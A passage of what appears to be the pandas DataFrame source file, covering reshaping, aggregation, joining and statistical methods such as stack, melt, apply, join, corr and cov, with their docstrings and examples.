non-numeric data
"""
@Substitution('')
@Appender(_shared_docs['pivot_table'])
def pivot_table(self, values=None, index=None, columns=None,
aggfunc='mean', fill_value=None, margins=False,
dropna=True, margins_name='All'):
from pandas.core.reshape.pivot import pivot_table
return pivot_table(self, values=values, index=index, columns=columns,
aggfunc=aggfunc, fill_value=fill_value,
margins=margins, dropna=dropna,
margins_name=margins_name)
def stack(self, level=-1, dropna=True):
"""
Stack the prescribed level(s) from columns to index.
Return a reshaped DataFrame or Series having a multi-level
index with one or more new inner-most levels compared to the current
DataFrame. The new inner-most levels are created by pivoting the
columns of the current dataframe:
- if the columns have a single level, the output is a Series;
- if the columns have multiple levels, the new index
level(s) is (are) taken from the prescribed level(s) and
the output is a DataFrame.
The new index levels are sorted.
Parameters
----------
level : int, str, list, default -1
Level(s) to stack from the column axis onto the index
axis, defined as one index or label, or a list of indices
or labels.
dropna : bool, default True
Whether to drop rows in the resulting Frame/Series with
missing values. Stacking a column level onto the index
axis can create combinations of index and column values
that are missing from the original dataframe. See Examples
section.
Returns
-------
DataFrame or Series
Stacked dataframe or series.
See Also
--------
DataFrame.unstack : Unstack prescribed level(s) from index axis
onto column axis.
DataFrame.pivot : Reshape dataframe from long format to wide
format.
DataFrame.pivot_table : Create a spreadsheet-style pivot table
as a DataFrame.
Notes
-----
The function is named by analogy with a collection of books
being re-organised from being side by side on a horizontal
position (the columns of the dataframe) to being stacked
vertically on top of of each other (in the index of the
dataframe).
Examples
--------
**Single level columns**
>>> df_single_level_cols = pd.DataFrame([[0, 1], [2, 3]],
... index=['cat', 'dog'],
... columns=['weight', 'height'])
Stacking a dataframe with a single level column axis returns a Series:
>>> df_single_level_cols
weight height
cat 0 1
dog 2 3
>>> df_single_level_cols.stack()
cat weight 0
height 1
dog weight 2
height 3
dtype: int64
**Multi level columns: simple case**
>>> multicol1 = pd.MultiIndex.from_tuples([('weight', 'kg'),
... ('weight', 'pounds')])
>>> df_multi_level_cols1 = pd.DataFrame([[1, 2], [2, 4]],
... index=['cat', 'dog'],
... columns=multicol1)
Stacking a dataframe with a multi-level column axis:
>>> df_multi_level_cols1
weight
kg pounds
cat 1 2
dog 2 4
>>> df_multi_level_cols1.stack()
weight
cat kg 1
pounds 2
dog kg 2
pounds 4
**Missing values**
>>> multicol2 = pd.MultiIndex.from_tuples([('weight', 'kg'),
... ('height', 'm')])
>>> df_multi_level_cols2 = pd.DataFrame([[1.0, 2.0], [3.0, 4.0]],
... index=['cat', 'dog'],
... columns=multicol2)
It is common to have missing values when stacking a dataframe
with multi-level columns, as the stacked dataframe typically
has more values than the original dataframe. Missing values
are filled with NaNs:
>>> df_multi_level_cols2
weight height
kg m
cat 1.0 2.0
dog 3.0 4.0
>>> df_multi_level_cols2.stack()
height weight
cat kg NaN 1.0
m 2.0 NaN
dog kg NaN 3.0
m 4.0 NaN
**Prescribing the level(s) to be stacked**
The first parameter controls which level or levels are stacked:
>>> df_multi_level_cols2.stack(0)
kg m
cat height NaN 2.0
weight 1.0 NaN
dog height NaN 4.0
weight 3.0 NaN
>>> df_multi_level_cols2.stack([0, 1])
cat height m 2.0
weight kg 1.0
dog height m 4.0
weight kg 3.0
dtype: float64
**Dropping missing values**
>>> df_multi_level_cols3 = pd.DataFrame([[None, 1.0], [2.0, 3.0]],
... index=['cat', 'dog'],
... columns=multicol2)
Note that rows where all values are missing are dropped by
default but this behaviour can be controlled via the dropna
keyword parameter:
>>> df_multi_level_cols3
weight height
kg m
cat NaN 1.0
dog 2.0 3.0
>>> df_multi_level_cols3.stack(dropna=False)
height weight
cat kg NaN NaN
m 1.0 NaN
dog kg NaN 2.0
m 3.0 NaN
>>> df_multi_level_cols3.stack(dropna=True)
height weight
cat m 1.0 NaN
dog kg NaN 2.0
m 3.0 NaN
"""
from pandas.core.reshape.reshape import stack, stack_multiple
if isinstance(level, (tuple, list)):
return stack_multiple(self, level, dropna=dropna)
else:
return stack(self, level, dropna=dropna)
def unstack(self, level=-1, fill_value=None):
"""
Pivot a level of the (necessarily hierarchical) index labels, returning
a DataFrame having a new level of column labels whose inner-most level
consists of the pivoted index labels. If the index is not a MultiIndex,
the output will be a Series (the analogue of stack when the columns are
not a MultiIndex).
The level involved will automatically get sorted.
Parameters
----------
level : int, string, or list of these, default -1 (last level)
Level(s) of index to unstack, can pass level name
fill_value : replace NaN with this value if the unstack produces
missing values
.. versionadded:: 0.18.0
See also
--------
DataFrame.pivot : Pivot a table based on column values.
DataFrame.stack : Pivot a level of the column labels (inverse operation
from `unstack`).
Examples
--------
>>> index = pd.MultiIndex.from_tuples([('one', 'a'), ('one', 'b'),
... ('two', 'a'), ('two', 'b')])
>>> s = pd.Series(np.arange(1.0, 5.0), index=index)
>>> s
one a 1.0
b 2.0
two a 3.0
b 4.0
dtype: float64
>>> s.unstack(level=-1)
a b
one 1.0 2.0
two 3.0 4.0
>>> s.unstack(level=0)
one two
a 1.0 3.0
b 2.0 4.0
>>> df = s.unstack(level=0)
>>> df.unstack()
one a 1.0
b 2.0
two a 3.0
b 4.0
dtype: float64
Returns
-------
unstacked : DataFrame or Series
"""
from pandas.core.reshape.reshape import unstack
return unstack(self, level, fill_value)
_shared_docs['melt'] = ("""
"Unpivots" a DataFrame from wide format to long format, optionally
leaving identifier variables set.
This function is useful to massage a DataFrame into a format where one
or more columns are identifier variables (`id_vars`), while all other
columns, considered measured variables (`value_vars`), are "unpivoted" to
the row axis, leaving just two non-identifier columns, 'variable' and
'value'.
%(versionadded)s
Parameters
----------
frame : DataFrame
id_vars : tuple, list, or ndarray, optional
Column(s) to use as identifier variables.
value_vars : tuple, list, or ndarray, optional
Column(s) to unpivot. If not specified, uses all columns that
are not set as `id_vars`.
var_name : scalar
Name to use for the 'variable' column. If None it uses
``frame.columns.name`` or 'variable'.
value_name : scalar, default 'value'
Name to use for the 'value' column.
col_level : int or string, optional
If columns are a MultiIndex then use this level to melt.
See also
--------
%(other)s
pivot_table
DataFrame.pivot
Examples
--------
>>> import pandas as pd
>>> df = pd.DataFrame({'A': {0: 'a', 1: 'b', 2: 'c'},
... 'B': {0: 1, 1: 3, 2: 5},
... 'C': {0: 2, 1: 4, 2: 6}})
>>> df
A B C
0 a 1 2
1 b 3 4
2 c 5 6
>>> %(caller)sid_vars=['A'], value_vars=['B'])
A variable value
0 a B 1
1 b B 3
2 c B 5
>>> %(caller)sid_vars=['A'], value_vars=['B', 'C'])
A variable value
0 a B 1
1 b B 3
2 c B 5
3 a C 2
4 b C 4
5 c C 6
The names of 'variable' and 'value' columns can be customized:
>>> %(caller)sid_vars=['A'], value_vars=['B'],
... var_name='myVarname', value_name='myValname')
A myVarname myValname
0 a B 1
1 b B 3
2 c B 5
If you have multi-index columns:
>>> df.columns = [list('ABC'), list('DEF')]
>>> df
A B C
D E F
0 a 1 2
1 b 3 4
2 c 5 6
>>> %(caller)scol_level=0, id_vars=['A'], value_vars=['B'])
A variable value
0 a B 1
1 b B 3
2 c B 5
>>> %(caller)sid_vars=[('A', 'D')], value_vars=[('B', 'E')])
(A, D) variable_0 variable_1 value
0 a B E 1
1 b B E 3
2 c B E 5
""")
@Appender(_shared_docs['melt'] %
dict(caller='df.melt(',
versionadded='.. versionadded:: 0.20.0\n',
other='melt'))
def melt(self, id_vars=None, value_vars=None, var_name=None,
value_name='value', col_level=None):
from pandas.core.reshape.melt import melt
return melt(self, id_vars=id_vars, value_vars=value_vars,
var_name=var_name, value_name=value_name,
col_level=col_level)
# ----------------------------------------------------------------------
# Time series-related
def diff(self, periods=1, axis=0):
"""
First discrete difference of element.
Calculates the difference of a DataFrame element compared with another
element in the DataFrame (default is the element in the same column
of the previous row).
Parameters
----------
periods : int, default 1
Periods to shift for calculating difference, accepts negative
values.
axis : {0 or 'index', 1 or 'columns'}, default 0
Take difference over rows (0) or columns (1).
.. versionadded:: 0.16.1.
Returns
-------
diffed : DataFrame
See Also
--------
Series.diff: First discrete difference for a Series.
DataFrame.pct_change: Percent change over given number of periods.
DataFrame.shift: Shift index by desired number of periods with an
optional time freq.
Examples
--------
Difference with previous row
>>> df = pd.DataFrame({'a': [1, 2, 3, 4, 5, 6],
... 'b': [1, 1, 2, 3, 5, 8],
... 'c': [1, 4, 9, 16, 25, 36]})
>>> df
a b c
0 1 1 1
1 2 1 4
2 3 2 9
3 4 3 16
4 5 5 25
5 6 8 36
>>> df.diff()
a b c
0 NaN NaN NaN
1 1.0 0.0 3.0
2 1.0 1.0 5.0
3 1.0 1.0 7.0
4 1.0 2.0 9.0
5 1.0 3.0 11.0
Difference with previous column
>>> df.diff(axis=1)
a b c
0 NaN 0.0 0.0
1 NaN -1.0 3.0
2 NaN -1.0 7.0
3 NaN -1.0 13.0
4 NaN 0.0 20.0
5 NaN 2.0 28.0
Difference with 3rd previous row
>>> df.diff(periods=3)
a b c
0 NaN NaN NaN
1 NaN NaN NaN
2 NaN NaN NaN
3 3.0 2.0 15.0
4 3.0 4.0 21.0
5 3.0 6.0 27.0
Difference with following row
>>> df.diff(periods=-1)
a b c
0 -1.0 0.0 -3.0
1 -1.0 -1.0 -5.0
2 -1.0 -1.0 -7.0
3 -1.0 -2.0 -9.0
4 -1.0 -3.0 -11.0
5 NaN NaN NaN
"""
bm_axis = self._get_block_manager_axis(axis)
new_data = self._data.diff(n=periods, axis=bm_axis)
return self._constructor(new_data)
# ----------------------------------------------------------------------
# Function application
def _gotitem(self, key, ndim, subset=None):
"""
sub-classes to define
return a sliced object
Parameters
----------
key : string / list of selections
ndim : 1,2
requested ndim of result
subset : object, default None
subset to act on
"""
if subset is None:
subset = self
# TODO: _shallow_copy(subset)?
return self[key]
_agg_doc = dedent("""
The aggregation operations are always performed over an axis, either the
index (default) or the column axis. This behavior is different from
`numpy` aggregation functions (`mean`, `median`, `prod`, `sum`, `std`,
`var`), where the default is to compute the aggregation of the flattened
array, e.g., ``numpy.mean(arr_2d)`` as opposed to ``numpy.mean(arr_2d,
axis=0)``.
`agg` is an alias for `aggregate`. Use the alias.
Examples
--------
>>> df = pd.DataFrame([[1, 2, 3],
... [4, 5, 6],
... [7, 8, 9],
... [np.nan, np.nan, np.nan]],
... columns=['A', 'B', 'C'])
Aggregate these functions over the rows.
>>> df.agg(['sum', 'min'])
A B C
sum 12.0 15.0 18.0
min 1.0 2.0 3.0
Different aggregations per column.
>>> df.agg({'A' : ['sum', 'min'], 'B' : ['min', 'max']})
A B
max NaN 8.0
min 1.0 2.0
sum 12.0 NaN
Aggregate over the columns.
>>> df.agg("mean", axis="columns")
0 2.0
1 5.0
2 8.0
3 NaN
dtype: float64
See also
--------
DataFrame.apply : Perform any type of operations.
DataFrame.transform : Perform transformation type operations.
pandas.core.groupby.GroupBy : Perform operations over groups.
pandas.core.resample.Resampler : Perform operations over resampled bins.
pandas.core.window.Rolling : Perform operations over rolling window.
pandas.core.window.Expanding : Perform operations over expanding window.
pandas.core.window.EWM : Perform operation over exponential weighted
window.
""")
@Appender(_agg_doc)
@Appender(_shared_docs['aggregate'] % dict(
versionadded='.. versionadded:: 0.20.0',
**_shared_doc_kwargs))
def aggregate(self, func, axis=0, *args, **kwargs):
axis = self._get_axis_number(axis)
# TODO: flipped axis
result = None
if axis == 0:
try:
result, how = self._aggregate(func, axis=0, *args, **kwargs)
except TypeError:
pass
if result is None:
return self.apply(func, axis=axis, args=args, **kwargs)
return result
agg = aggregate
def apply(self, func, axis=0, broadcast=None, raw=False, reduce=None,
result_type=None, args=(), **kwds):
"""
Apply a function along an axis of the DataFrame.
Objects passed to the function are Series objects whose index is
either the DataFrame's index (``axis=0``) or the DataFrame's columns
(``axis=1``). By default (``result_type=None``), the final return type
is inferred from the return type of the applied function. Otherwise,
it depends on the `result_type` argument.
Parameters
----------
func : function
Function to apply to each column or row.
axis : {0 or 'index', 1 or 'columns'}, default 0
Axis along which the function is applied:
* 0 or 'index': apply function to each column.
* 1 or 'columns': apply function to each row.
broadcast : bool, optional
Only relevant for aggregation functions:
* ``False`` or ``None`` : returns a Series whose length is the
length of the index or the number of columns (based on the
`axis` parameter)
* ``True`` : results will be broadcast to the original shape
of the frame, the original index and columns will be retained.
.. deprecated:: 0.23.0
This argument will be removed in a future version, replaced
by result_type='broadcast'.
raw : bool, default False
* ``False`` : passes each row or column as a Series to the
function.
* ``True`` : the passed function will receive ndarray objects
instead.
If you are just applying a NumPy reduction function this will
achieve much better performance.
reduce : bool or None, default None
Try to apply reduction procedures. If the DataFrame is empty,
`apply` will use `reduce` to determine whether the result
should be a Series or a DataFrame. If ``reduce=None`` (the
default), `apply`'s return value will be guessed by calling
`func` on an empty Series
(note: while guessing, exceptions raised by `func` will be
ignored).
If ``reduce=True`` a Series will always be returned, and if
``reduce=False`` a DataFrame will always be returned.
.. deprecated:: 0.23.0
This argument will be removed in a future version, replaced
by ``result_type='reduce'``.
result_type : {'expand', 'reduce', 'broadcast', None}, default None
These only act when ``axis=1`` (columns):
* 'expand' : list-like results will be turned into columns.
* 'reduce' : returns a Series if possible rather than expanding
list-like results. This is the opposite of 'expand'.
* 'broadcast' : results will be broadcast to the original shape
of the DataFrame, the original index and columns will be
retained.
The default behaviour (None) depends on the return value of the
applied function: list-like results will be returned as a Series
of those. However if the apply function returns a Series these
are expanded to columns.
.. versionadded:: 0.23.0
args : tuple
Positional arguments to pass to `func` in addition to the
array/series.
**kwds
Additional keyword arguments to pass as keywords arguments to
`func`.
Notes
-----
In the current implementation apply calls `func` twice on the
first column/row to decide whether it can take a fast or slow
code path. This can lead to unexpected behavior if `func` has
side-effects, as they will take effect twice for the first
column/row.
See also
--------
DataFrame.applymap: For elementwise operations
DataFrame.aggregate: only perform aggregating type operations
DataFrame.transform: only perform transformating type operations
Examples
--------
>>> df = pd.DataFrame([[4, 9],] * 3, columns=['A', 'B'])
>>> df
A B
0 4 9
1 4 9
2 4 9
Using a numpy universal function (in this case the same as
``np.sqrt(df)``):
>>> df.apply(np.sqrt)
A B
0 2.0 3.0
1 2.0 3.0
2 2.0 3.0
Using a reducing function on either axis
>>> df.apply(np.sum, axis=0)
A 12
B 27
dtype: int64
>>> df.apply(np.sum, axis=1)
0 13
1 13
2 13
dtype: int64
Retuning a list-like will result in a Series
>>> df.apply(lambda x: [1, 2], axis=1)
0 [1, 2]
1 [1, 2]
2 [1, 2]
dtype: object
Passing result_type='expand' will expand list-like results
to columns of a Dataframe
>>> df.apply(lambda x: [1, 2], axis=1, result_type='expand')
0 1
0 1 2
1 1 2
2 1 2
Returning a Series inside the function is similar to passing
``result_type='expand'``. The resulting column names
will be the Series index.
>>> df.apply(lambda x: pd.Series([1, 2], index=['foo', 'bar']), axis=1)
foo bar
0 1 2
1 1 2
2 1 2
Passing ``result_type='broadcast'`` will ensure the same shape
result, whether list-like or scalar is returned by the function,
and broadcast it along the axis. The resulting column names will
be the originals.
>>> df.apply(lambda x: [1, 2], axis=1, result_type='broadcast')
A B
0 1 2
1 1 2
2 1 2
Returns
-------
applied : Series or DataFrame
"""
from pandas.core.apply import frame_apply
op = frame_apply(self,
func=func,
axis=axis,
broadcast=broadcast,
raw=raw,
reduce=reduce,
result_type=result_type,
args=args,
kwds=kwds)
return op.get_result()
def applymap(self, func):
"""
Apply a function to a Dataframe elementwise.
This method applies a function that accepts and returns a scalar
to every element of a DataFrame.
Parameters
----------
func : callable
Python function, returns a single value from a single value.
Returns
-------
DataFrame
Transformed DataFrame.
See also
--------
DataFrame.apply : Apply a function along input axis of DataFrame
Examples
--------
>>> df = pd.DataFrame([[1, 2.12], [3.356, 4.567]])
>>> df
0 1
0 1.000 2.120
1 3.356 4.567
>>> df.applymap(lambda x: len(str(x)))
0 1
0 3 4
1 5 5
Note that a vectorized version of `func` often exists, which will
be much faster. You could square each number elementwise.
>>> df.applymap(lambda x: x**2)
0 1
0 1.000000 4.494400
1 11.262736 20.857489
But it's better to avoid applymap in that case.
>>> df ** 2
0 1
0 1.000000 4.494400
1 11.262736 20.857489
"""
# if we have a dtype == 'M8[ns]', provide boxed values
def infer(x):
if x.empty:
return lib.map_infer(x, func)
return lib.map_infer(x.astype(object).values, func)
return self.apply(infer)
# ----------------------------------------------------------------------
# Merging / joining methods
def append(self, other, ignore_index=False, verify_integrity=False):
"""
Append rows of `other` to the end of this frame, returning a new
object. Columns not in this frame are added as new columns.
Parameters
----------
other : DataFrame or Series/dict-like object, or list of these
The data to append.
ignore_index : boolean, default False
If True, do not use the index labels.
verify_integrity : boolean, default False
If True, raise ValueError on creating index with duplicates.
Returns
-------
appended : DataFrame
Notes
-----
If a list of dict/series is passed and the keys are all contained in
the DataFrame's index, the order of the columns in the resulting
DataFrame will be unchanged.
Iteratively appending rows to a DataFrame can be more computationally
intensive than a single concatenate. A better solution is to append
those rows to a list and then concatenate the list with the original
DataFrame all at once.
See also
--------
pandas.concat : General function to concatenate DataFrame, Series
or Panel objects
Examples
--------
>>> df = pd.DataFrame([[1, 2], [3, 4]], columns=list('AB'))
>>> df
A B
0 1 2
1 3 4
>>> df2 = pd.DataFrame([[5, 6], [7, 8]], columns=list('AB'))
>>> df.append(df2)
A B
0 1 2
1 3 4
0 5 6
1 7 8
With `ignore_index` set to True:
>>> df.append(df2, ignore_index=True)
A B
0 1 2
1 3 4
2 5 6
3 7 8
The following, while not recommended methods for generating DataFrames,
show two ways to generate a DataFrame from multiple data sources.
Less efficient:
>>> df = pd.DataFrame(columns=['A'])
>>> for i in range(5):
... df = df.append({'A': i}, ignore_index=True)
>>> df
A
0 0
1 1
2 2
3 3
4 4
More efficient:
>>> pd.concat([pd.DataFrame([i], columns=['A']) for i in range(5)],
... ignore_index=True)
A
0 0
1 1
2 2
3 3
4 4
"""
if isinstance(other, (Series, dict)):
if isinstance(other, dict):
other = Series(other)
if other.name is None and not ignore_index:
raise TypeError('Can only append a Series if ignore_index=True'
' or if the Series has a name')
if other.name is None:
index = None
else:
# other must have the same index name as self, otherwise
# index name will be reset
index = Index([other.name], name=self.index.name)
combined_columns = self.columns.tolist() + self.columns.union(
other.index).difference(self.columns).tolist()
other = other.reindex(combined_columns, copy=False)
other = DataFrame(other.values.reshape((1, len(other))),
index=index,
columns=combined_columns)
other = other._convert(datetime=True, timedelta=True)
if not self.columns.equals(combined_columns):
self = self.reindex(columns=combined_columns)
elif isinstance(other, list) and not isinstance(other[0], DataFrame):
other = DataFrame(other)
if (self.columns.get_indexer(other.columns) >= 0).all():
other = other.loc[:, self.columns]
from pandas.core.reshape.concat import concat
if isinstance(other, (list, tuple)):
to_concat = [self] + other
else:
to_concat = [self, other]
return concat(to_concat, ignore_index=ignore_index,
verify_integrity=verify_integrity)
def join(self, other, on=None, how='left', lsuffix='', rsuffix='',
sort=False):
"""
Join columns with other DataFrame either on index or on a key
column. Efficiently Join multiple DataFrame objects by index at once by
passing a list.
Parameters
----------
other : DataFrame, Series with name field set, or list of DataFrame
Index should be similar to one of the columns in this one. If a
Series is passed, its name attribute must be set, and that will be
used as the column name in the resulting joined DataFrame
on : name, tuple/list of names, or array-like
Column or index level name(s) in the caller to join on the index
in `other`, otherwise joins index-on-index. If multiple
values given, the `other` DataFrame must have a MultiIndex. Can
pass an array as the join key if it is not already contained in
the calling DataFrame. Like an Excel VLOOKUP operation
how : {'left', 'right', 'outer', 'inner'}, default: 'left'
How to handle the operation of the two objects.
* left: use calling frame's index (or column if on is specified)
* right: use other frame's index
* outer: form union of calling frame's index (or column if on is
specified) with other frame's index, and sort it
lexicographically
* inner: form intersection of calling frame's index (or column if
on is specified) with other frame's index, preserving the order
of the calling's one
lsuffix : string
Suffix to use from left frame's overlapping columns
rsuffix : string
Suffix to use from right frame's overlapping columns
sort : boolean, default False
Order result DataFrame lexicographically by the join key. If False,
the order of the join key depends on the join type (how keyword)
Notes
-----
on, lsuffix, and rsuffix options are not supported when passing a list
of DataFrame objects
Support for specifying index levels as the `on` parameter was added
in version 0.23.0
Examples
--------
>>> caller = pd.DataFrame({'key': ['K0', 'K1', 'K2', 'K3', 'K4', 'K5'],
... 'A': ['A0', 'A1', 'A2', 'A3', 'A4', 'A5']})
>>> caller
A key
0 A0 K0
1 A1 K1
2 A2 K2
3 A3 K3
4 A4 K4
5 A5 K5
>>> other = pd.DataFrame({'key': ['K0', 'K1', 'K2'],
... 'B': ['B0', 'B1', 'B2']})
>>> other
B key
0 B0 K0
1 B1 K1
2 B2 K2
Join DataFrames using their indexes.
>>> caller.join(other, lsuffix='_caller', rsuffix='_other')
>>> A key_caller B key_other
0 A0 K0 B0 K0
1 A1 K1 B1 K1
2 A2 K2 B2 K2
3 A3 K3 NaN NaN
4 A4 K4 NaN NaN
5 A5 K5 NaN NaN
If we want to join using the key columns, we need to set key to be
the index in both caller and other. The joined DataFrame will have
key as its index.
>>> caller.set_index('key').join(other.set_index('key'))
>>> A B
key
K0 A0 B0
K1 A1 B1
K2 A2 B2
K3 A3 NaN
K4 A4 NaN
K5 A5 NaN
Another option to join using the key columns is to use the on
parameter. DataFrame.join always uses other's index but we can use any
column in the caller. This method preserves the original caller's
index in the result.
>>> caller.join(other.set_index('key'), on='key')
>>> A key B
0 A0 K0 B0
1 A1 K1 B1
2 A2 K2 B2
3 A3 K3 NaN
4 A4 K4 NaN
5 A5 K5 NaN
See also
--------
DataFrame.merge : For column(s)-on-columns(s) operations
Returns
-------
joined : DataFrame
"""
# For SparseDataFrame's benefit
return self._join_compat(other, on=on, how=how, lsuffix=lsuffix,
rsuffix=rsuffix, sort=sort)
def _join_compat(self, other, on=None, how='left', lsuffix='', rsuffix='',
sort=False):
from pandas.core.reshape.merge import merge
from pandas.core.reshape.concat import concat
if isinstance(other, Series):
if other.name is None:
raise ValueError('Other Series must have a name')
other = DataFrame({other.name: other})
if isinstance(other, DataFrame):
return merge(self, other, left_on=on, how=how,
left_index=on is None, right_index=True,
suffixes=(lsuffix, rsuffix), sort=sort)
else:
if on is not None:
raise ValueError('Joining multiple DataFrames only supported'
' for joining on index')
frames = [self] + list(other)
can_concat = all(df.index.is_unique for df in frames)
# join indexes only using concat
if can_concat:
if how == 'left':
how = 'outer'
join_axes = [self.index]
else:
join_axes = None
return concat(frames, axis=1, join=how, join_axes=join_axes,
verify_integrity=True)
joined = frames[0]
for frame in frames[1:]:
joined = merge(joined, frame, how=how, left_index=True,
right_index=True)
return joined
@Substitution('')
@Appender(_merge_doc, indents=2)
def merge(self, right, how='inner', on=None, left_on=None, right_on=None,
left_index=False, right_index=False, sort=False,
suffixes=('_x', '_y'), copy=True, indicator=False,
validate=None):
from pandas.core.reshape.merge import merge
return merge(self, right, how=how, on=on, left_on=left_on,
right_on=right_on, left_index=left_index,
right_index=right_index, sort=sort, suffixes=suffixes,
copy=copy, indicator=indicator, validate=validate)
def round(self, decimals=0, *args, **kwargs):
"""
Round a DataFrame to a variable number of decimal places.
Parameters
----------
decimals : int, dict, Series
Number of decimal places to round each column to. If an int is
given, round each column to the same number of places.
Otherwise dict and Series round to variable numbers of places.
Column names should be in the keys if `decimals` is a
dict-like, or in the index if `decimals` is a Series. Any
columns not included in `decimals` will be left as is. Elements
of `decimals` which are not columns of the input will be
ignored.
Examples
--------
>>> df = pd.DataFrame(np.random.random([3, 3]),
... columns=['A', 'B', 'C'], index=['first', 'second', 'third'])
>>> df
A B C
first 0.028208 0.992815 0.173891
second 0.038683 0.645646 0.577595
third 0.877076 0.149370 0.491027
>>> df.round(2)
A B C
first 0.03 0.99 0.17
second 0.04 0.65 0.58
third 0.88 0.15 0.49
>>> df.round({'A': 1, 'C': 2})
A B C
first 0.0 0.992815 0.17
second 0.0 0.645646 0.58
third 0.9 0.149370 0.49
>>> decimals = pd.Series([1, 0, 2], index=['A', 'B', 'C'])
>>> df.round(decimals)
A B C
first 0.0 1 0.17
second 0.0 1 0.58
third 0.9 0 0.49
Returns
-------
DataFrame object
See Also
--------
numpy.around
Series.round
"""
from pandas.core.reshape.concat import concat
def _dict_round(df, decimals):
for col, vals in df.iteritems():
try:
yield _series_round(vals, decimals[col])
except KeyError:
yield vals
def _series_round(s, decimals):
if is_integer_dtype(s) or is_float_dtype(s):
return s.round(decimals)
return s
nv.validate_round(args, kwargs)
if isinstance(decimals, (dict, Series)):
if isinstance(decimals, Series):
if not decimals.index.is_unique:
raise ValueError("Index of decimals must be unique")
new_cols = [col for col in _dict_round(self, decimals)]
elif is_integer(decimals):
# Dispatch to Series.round
new_cols = [_series_round(v, decimals)
for _, v in self.iteritems()]
else:
raise TypeError("decimals must be an integer, a dict-like or a "
"Series")
if len(new_cols) > 0:
return self._constructor(concat(new_cols, axis=1),
index=self.index,
columns=self.columns)
else:
return self
# ----------------------------------------------------------------------
# Statistical methods, etc.
def corr(self, method='pearson', min_periods=1):
"""
Compute pairwise correlation of columns, excluding NA/null values
Parameters
----------
method : {'pearson', 'kendall', 'spearman'}
* pearson : standard correlation coefficient
* kendall : Kendall Tau correlation coefficient
* spearman : Spearman rank correlation
min_periods : int, optional
Minimum number of observations required per pair of columns
to have a valid result. Currently only available for pearson
and spearman correlation
Returns
-------
y : DataFrame
"""
numeric_df = self._get_numeric_data()
cols = numeric_df.columns
idx = cols.copy()
mat = numeric_df.values
if method == 'pearson':
correl = libalgos.nancorr(_ensure_float64(mat), minp=min_periods)
elif method == 'spearman':
correl = libalgos.nancorr_spearman(_ensure_float64(mat),
minp=min_periods)
else:
if min_periods is None:
min_periods = 1
mat = _ensure_float64(mat).T
corrf = nanops.get_corr_func(method)
K = len(cols)
correl = np.empty((K, K), dtype=float)
mask = np.isfinite(mat)
for i, ac in enumerate(mat):
for j, bc in enumerate(mat):
if i > j:
continue
valid = mask[i] & mask[j]
if valid.sum() < min_periods:
c = np.nan
elif i == j:
c = 1.
elif not valid.all():
c = corrf(ac[valid], bc[valid])
else:
c = corrf(ac, bc)
correl[i, j] = c
correl[j, i] = c
return self._constructor(correl, index=idx, columns=cols)
def cov(self, min_periods=None):
"""
Compute pairwise covariance of columns, excluding NA/null values.
Compute the pairwise covariance among the series of a DataFrame.
The returned data frame is the `covariance matrix
<https://en.wikipedia.org/wiki/Covariance_matrix>`__ of the columns
of the DataFrame.
Both NA and null values are automatically excluded from the
calculation. (See the note below about bias from missing values.)
A threshold can be set for the minimum number of
observations for each value created. Comparisons with observations
below this threshold will be returned as ``NaN``.
This method is generally used for the analysis of time series data to
understand the relationship between different measures
across time.
Parameters
----------
min_periods : int, optional
Minimum number of observations required per pair of columns
to have a valid result.
Returns
-------
DataFrame
The covariance matrix of the series of the DataFrame.
See Also
--------
pandas.Series.cov : compute covariance with another Series
pandas.core.window.EWM.cov: expoential weighted sample covariance
pandas.core.window.Expanding.cov : expanding sample covariance
pandas.core.window.Rolling.cov : rolling sample covariance
Notes
-----
Returns the covariance matrix of the DataFrame's time series.
The covariance is normalized by N-1.
For DataFrames that have Series that are missing data (assuming that
data is `missing at random
<https://en.wikipedia.org/wiki/Missing_data#Missing_at_random>`__)
the returned covariance matrix will be an unbiased estimate
of the variance and covariance between the member Series.
However, for many applications this estimate may not be acceptable
because the estimate covariance matrix is not guaranteed to be positive
semi-definite. This could lead to estimate correlations having
absolute values which are greater than one, and/or a non-invertible
covariance matrix. See `Estimation of covariance matrices
<http://en.wikipedia.org/w/index.php?title=Estimation_of_covariance_
matrices>`__ for more details.
Examples
--------
>>> df = pd.DataFrame([(1, 2), (0, 3), (2, 0), (1, 1)],
... columns=['dogs', 'cats'])
>>> df.cov()
dogs cats
dogs 0.666667 -1.000000
cats -1.000000 1.666667
>>> np.random.seed(42)
>>> df = pd.DataFrame(np.random.randn(1000, 5),
... columns=['a', 'b', 'c', 'd', 'e'])
>>> df.cov()
a b c d e
a 0.998438 -0.020161 0.059277 -0.008943 0.014144
b -0.020161 1.059352 -0.008543 -0.024738 0.009826
c 0.059277 -0.008543 1.010670 -0.001486 -0.000271
d -0.008943 -0.024738 -0.001486 0.921297 -0.013692
e 0.014144 0.009826 -0.000271 -0.013692 0.977795
**Minimum number of periods**
This method also supports an optional ``min_periods`` keyword
that specifies the required minimum number of non-NA observations for
each column pair in order to have a valid result:
>>> np.random.seed(42)
>>> df = pd.DataFrame(np.random.randn(20, 3),
... columns=['a', 'b', 'c'])
>>> df.loc[df.index[:5], 'a'] = np.nan
>>> df.loc[df.index[5:10], 'b'] = np.nan
>>> df.cov(min_periods=12)
a b c
a 0.316741 NaN -0.150812
b NaN 1.248003 0.191417
c -0.150812 0.191417 0.895202
"""
numeric_df = self._get_numeric_data()
cols = numeric_df.columns
idx = cols.copy()
mat = numeric_df.values
if notna(mat).all():
if min_periods is not None and min_periods > len(mat):
baseCov = np.empty((mat.shape[1], mat.shape[1]))
baseCov.fill(np.nan)
else:
baseCov = np.cov(mat.T)
baseCov = baseCov.reshape((len(cols), len(cols)))
else:
baseCov = libalgos.nancorr(_ensure_float64(mat), cov=True,
minp=min_periods)
return self._constructor(baseCov, index=idx, columns=cols)
def corrwith(self, other, axis=0, drop=False):
"""
Compute pairwise correlation between rows or columns of two DataFrame
objects.
Parameters
----------
other : DataFrame, Series
axis : {0 or 'index', 1 or 'columns'}, default 0
0 or 'index' to compute column-wise, 1 or 'columns' for row-wise
drop : boolean, default False
Drop missing indices from result, default returns union of all
Returns
-------
correls : Series
"""
axis = self._get_axis_number(axis)
this = self._get_numeric_data()
if isinstance(other, Series):
return this.apply(other.corr, axis=axis)
other = other._get_numeric_data()
left, right = this.align(other, join='inner', copy=False)
# mask missing values
left = left + right * 0
right = right + left * 0
if axis == 1:
left = left.T
right = right.T
# demeaned data
ldem = left - left.mean()
rdem = right - right.mean()
num = (ldem * rdem).sum()
dom = (left.count() - 1) * left.std() * right.std()
correl = num / dom
if not drop:
raxis = 1 if axis == 0 else 0
result_index = this._get_axis(raxis).union(other._get_axis(raxis))
correl = correl.reindex(result_index)
return correl
